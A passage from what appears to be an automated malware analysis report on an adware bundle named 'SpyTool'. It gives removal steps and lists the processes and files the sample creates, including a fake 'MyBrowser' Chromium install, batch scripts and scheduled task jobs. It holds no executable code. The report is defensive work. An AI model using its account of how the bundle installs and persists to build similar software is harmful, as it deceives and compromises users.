4120c792ee30c922d95c5201cedade29c:\Program Files\MyBrowser\MyBrowser\Application\mybrowser.exe
690f4b16c53bec409e4f465cfb4231a3c:\Program Files\MyBrowser\MyBrowser\Application\utility.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.

Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    upgmsd_re_005010096.exe:1276
    nsf2B.tmp:1664
    nsf2B.tmp:668
    nswA.tmp:1336
    gmsd_re_005010096.exe:592
    nsr19.tmp:204
    nsdF.tmp:1060
    fsd34.exe:1692
    nsw42.tmp:660
    setup.exe:1356
    taskkill.exe:1804
    taskkill.exe:1796
    taskkill.exe:660
    nsj32.tmp:1912
    amisid.exe:1952
    amisid.exe:1844
    tasklist.exe:1852
    tasklist.exe:324
    nss12.tmp:1616
    9823.exe:320
    nsx36.tmp:1468
    encrypt.exe:1060
    encrypt.exe:1476
    encrypt.exe:1100
    encrypt.exe:1584
    nsx1C.tmp:1896
    nsx1C.tmp:1088
    nst25.tmp:1804
    nsk6.tmp:204
    %original file name%.exe:1736

  2. Delete the original SpyTool file.
  3. Delete or disinfect the following files created/modified by the SpyTool:

    %Documents and Settings%\%current user%\Cookies\index.dat (788 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@prof.youandmeandmeandyouhihi[1].txt (227 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@youandmeandmeandyouhihi[1].txt (176 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\upgmsd_re_005010096.cyl (428 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\GAMESDESKTOP\GamesDesktop.lnk (812 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp (4 bytes)
    %Program Files%\gmsd_re_005010096\predm.exe (2321 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\upgmsd_re_005010096.7z (7433 bytes)
    %Program Files%\gmsd_re_005010096\gmsd_re_005010096.exe (29430 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\is-UGOR9.tmp (7433 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\CheckProc.cmd (288 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\predm.7z (2105 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\is-9SIQI.tmp (2105 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\_isetup\_shfoldr.dll (23 bytes)
    %Program Files%\gmsd_re_005010096\unins000.msg (375 bytes)
    %Program Files%\gmsd_re_005010096\gamesdesktop_widget.exe (77005 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\is-LKR89.tmp (15278 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\upgmsd_re_005010096.exe (23062 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\encrypt.exe (4185 bytes)
    %Program Files%\gmsd_re_005010096\is-FEB6H.tmp (22284 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\is-L9FO9.tmp (8657 bytes)
    %Program Files%\gmsd_re_005010096\unins000.dat (29605 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\itdownload.dll (1281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\gmsd_re_005010096.7z (8657 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\ex.bat (1564 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\is-P9554.tmp (4185 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\gamesdesktop_widget.7z (15278 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-KUMK3.tmp\nsf2B.tmp (3781 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsnD.tmp (7695 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\gmsd_re_005010096\1.20\cnf.cyl (269 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx1D.tmp\inetc.dll (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\Bundle_OperaRUnew[1].exe (7288 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx1C.tmp (7288 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\9823.exe (14988 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\f9626892-7a78-3199-abd2-97bbce96297b\OfferInstaller.exe (1617 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst4A.tmp\inetc.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst49.tmp (19514 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst4A.tmp\WmiInspector.dll (3616 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst4A.tmp\flush-inetc.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst4A.tmp\UserInfo.dll (4 bytes)
    %Program Files%\AnyProtectEx\product.guid (40 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst4A.tmp\System.dll (11 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\VisualElements\smalllogo.png (9 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\sv.pak (207 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\chrome.7z (1161171 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\MyBrowser\MyBrowser.lnk (1 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\sl.pak (211 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\pdf.dll (67091 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\VisualElementsManifest.xml (392 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\pt-PT.pak (222 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\hr.pak (214 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\metro_driver.dll (1765 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\PepperFlash\manifest.json (2 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\es.pak (230 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\chrome.dll (237340 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\fi.pak (213 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\pl.pak (220 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\vi.pak (247 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\hi.pak (1712 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\he.pak (253 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\delegate_execute.exe (12288 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe (5873 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ko.pak (228 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\id.pak (202 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\fa.pak (308 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\sr.pak (1610 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\nl.pak (216 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Extensions\external_extensions.json (103 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\mybrowser.exe (3869 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\chrome_100_percent.pak (7386 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\VisualElements\logo.png (5 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\ffmpegsumo.dll (6337 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\da.pak (206 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\en-US.pak (189 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\lt.pak (221 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\icudtl.dat (76792 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\lv.pak (225 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\de.pak (224 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\master_preferences (814 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\sw.pak (208 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\libglesv2.dll (5442 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\chrome_200_percent.pak (7972 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\resources.pak (121304 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\zh-CN.pak (187 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\am.pak (302 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\d3dcompiler_46.dll (22433 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\nacl64.exe (12288 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\mr.pak (1708 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\MyBrowser.lnk (1 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\libegl.dll (204 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\en-GB.pak (189 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\sk.pak (229 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\chrome_child.dll (261193 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ml.pak (1826 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\es-419.pak (226 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\kn.pak (1768 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\fil.pak (228 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\fr.pak (239 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\el.pak (1667 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ta.pak (1784 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe (6841 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\pt-BR.pak (217 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\bg.pak (1640 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\nb.pak (206 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\PepperFlash\pepflashplayer.dll (122658 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\bn.pak (1731 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ja.pak (266 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\VisualElements\splash-620x300.png (11 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ca.pak (227 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\cs.pak (223 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\wow_helper.exe (67 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe (6841 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\secondarytile.png (3 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ro.pak (228 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\zh-TW.pak (190 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ru.pak (1612 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\te.pak (1761 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\chrome_elf.dll (125 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\uk.pak (1621 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\nacl_irt_x86_64.nexe (20507 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\it.pak (220 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\nacl_irt_x86_32.nexe (15801 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\th.pak (1702 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\et.pak (201 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ar.pak (293 bytes)
    %Documents and Settings%\All Users\Desktop\MyBrowser.lnk (1 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\hu.pak (235 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\gu.pak (1705 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\libexif.dll (303 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ms.pak (206 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\tr.pak (220 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\39.5.2171.95.manifest (222 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\FinalInstaller_dotnet4[1].exe (1479345 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\fsd34.exe (388270 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\weather_channel.ico (5593 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\ebay.ico (55 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\msn.ico (36 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\espn.ico (36 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\pinterest.ico (39 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\bestbuy.ico (3913 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\tumblr.ico (40 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\imdb.ico (2993 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\utility.exe (14988 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\tripadvisor.ico (1917 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\linkedin.ico (37 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\groupom.ico (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\bbc.ico (1588 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\groupom.ico (2993 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\booking.com.ico (1601 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\gizmodo.ico (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\hotels.com.ico (1601 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\cnn.ico (45 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\gmail.ico (47 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\bing.ico (42 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\espn.ico (1588 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\ikea.ico (2993 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\bbc.ico (35 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\etsy.ico (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\youtube.ico (3913 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\yahoo_mail.ico (1913 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\nfl.ico (1913 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\ted.ico (57 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\ie.zip[1].004 (3985887 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\ie.zip[1].005 (3985887 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\ie.zip[1].001 (3985887 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\ie.zip[1].002 (3985887 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\ie.zip[1].003 (3985887 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\netflix.ico (1909 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\google_plus.ico (64 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\search.ico (57 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\booking.com.ico (45 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\netflix.ico (51 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\priceline.ico (53 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\bestbuy.ico (601 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\twitter.ico (36 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\pinterest.ico (1592 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\huffingtonpost.ico (1909 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\walmart.ico (48 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\amazon.ico (601 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\google_news.ico (601 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\agoda.ico (61 bytes)
    %WinDir%\Tasks\27A66B06-9E26-42DD-B887-47E55490B3.job (1644 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\target.ico (50 bytes)
    %WinDir%\Tasks\MyBrowser.job (1966 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\9gag.ico (56 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_finance.ico (601 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\yandex.ico (35 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\nytimes.ico (61 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\skype.ico (44 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\huffingtonpost.ico (49 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\forbes.ico (1592 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\etsy.ico (3913 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\ipgeoapi[1] (40 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\walmart.ico (1601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\prefs (823 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\gmail.ico (1601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\kayak.com.ico (1601 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\yelp.ico (42 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_search.ico (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\mail.ru.ico (1909 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\weather_channel.ico (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\yahoo_finance.ico (2993 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\setup.exe (37305 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\google_translate.ico (38 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\reddit.ico (60 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\mail.ru.ico (49 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\wikipedia.ico (1913 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\forbes.ico (40 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\imdb.ico (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\mail_live_msn.ico (1592 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\9gag.ico (1913 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\bing.ico (1597 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (313192 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\amazon.ico (2993 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\expedia.ico (61 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\cnn.ico (1601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\yelp.ico (1597 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\nytimes.ico (1921 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\icon.json (9 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\nba.ico (48 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\msn.ico (1588 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\target.ico (1909 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\agoda.ico (1921 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\theguardian.ico (1597 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\google_news.ico (2993 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\yandex.ico (1588 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\theguardian.ico (42 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\mail_live_msn.ico (38 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\facebook.ico (3913 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\kayak.com.ico (47 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_mail.ico (56 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\twitter.ico (1588 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\linkedin.ico (1592 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\priceline.ico (1913 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\chrome.packed.7z (1312726 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\yahoo_search.ico (5593 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo.ico (39 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\ted.ico (1913 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\wikipedia.ico (55 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\nba.ico (1601 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\tripadvisor.ico (58 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\search.ico (1917 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\tumblr.ico (1592 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\ikea.ico (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\icon.json (21 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\gizmodo.ico (2993 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\nfl.ico (56 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\yahoo.ico (1592 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\facebook.ico (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\google_plus.ico (1921 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\reddit.ico (1917 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\hotels.com.ico (47 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\27A66B06-9E26-42DD-B887-47E55490B3\27A66B06-9E26-42DD-B887-47E55490B3.exe (14988 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\ebay.ico (1913 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\youtube.ico (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\skype.ico (1597 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\chrome.dat (31 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\expedia.ico (1921 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\google_translate.ico (1592 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd3A.tmp\inetc.dll (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsz3B.tmp (43 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@histats[1].txt (199 bytes)
